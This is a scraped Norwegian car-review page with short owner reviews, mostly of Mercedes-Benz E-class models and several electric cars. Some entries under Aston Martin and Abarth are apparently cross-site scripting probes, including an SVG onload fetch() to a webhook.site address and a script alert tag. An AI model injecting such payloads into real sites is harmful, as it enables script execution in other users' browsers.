Vurdert av bige
Mercedes-Benz E-klasse (2016)
Taxikjørt og passert 340000 km ,men føles som ny . Taxi eier har ikke slurvet med bilen ser jeg på historikken
Mercedes-Benz E-klasse (2016)
E klasse med 4matic og luftfjæring er en fantastisk bil. Det helt optimale ville nok vært 350. Stor tung bil krever litt motor.
Mercedes-Benz E-klasse (2016)
Kjempefin bil som er veldig god å kjøre !
Mercedes-Benz E-klasse (2016)
Jeg er fornøyd med bilen min. Så langt har jeg ikke noe å klage på. Ingen reparasjoner av noe slag. God garanti, og god kvalitet.
Mercedes-Benz E-klasse (2016)
Dyr i drift, og noe kjedelige kjøreegenskaper. Kommer til å velge noe annet neste gang.
Mercedes-Benz E-klasse (2016)
Fornøyd med bilen. Interiøret er "gammelt" sammenlignet med den nye e-klassen.
Mercedes-Benz E-klasse (2015)
Jeg er alt i alt kanonfornøyd med denne bilen, nå er den passert 370k og ruller bare på. Det eneste som var dyrt å ordne og som jeg ikke kunne ordne selv, var AD BLUE opplegget, det er svindyrt og
Mercedes-Benz E-klasse (2015)
Mb viser at de kan lage biler i toppklasse her, alt er meget godt gjennomført og gjennomtenkt. Konservativ, men oser av klasse og kvalitet.
Mercedes-Benz E-klasse (2015)
Stille, rolig og viktigst av alt; komfortabel. Ingen ulyder som knirking eller knaking/risting. Ingen sinke på veien takket være ypperlig automat og godt med Nm. Stille gange på dieselmotoren. Perf
Mercedes-Benz E-klasse (2015)
Meget godt fornøyd med både kvalitet, kjørefølelse og kjøreegenskaper. Bilen gir den ekstra litt gedigne kvalitetsfølelsen som man forventer seg av Mercedes. Man gleder seg til bilturen når man
Mercedes-Benz E-klasse (2014)
Meget god bil.
Mercedes-Benz E-klasse (2014)
Anbefales på det sterkeste. Dette er ekte tysk kvalitet og blir nok mercedes neste gang også.
Mercedes-Benz E-klasse (2014)
Fikk bilen ny i Sindelfingen- en opplevelse! Ellers var fargeutvalget bedre på modellen før- her var det ingen burgunderrød eller beige som jeg helst ville ha hatt. Det eneste minuset med bilen er
Mercedes-Benz E-klasse (2014)
meget fornøyd med bilen så langt. svært god plass, behagelig å kjøre, lite feil, billig i forbruk men en liten tanke svak motor til en så stor og tung bil.
Mercedes-Benz E-klasse (2014)
Fantastisk bil. Driftssikker, går billig, sterk, kan kjøre 8 timer uten annet enn toalettpauser.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km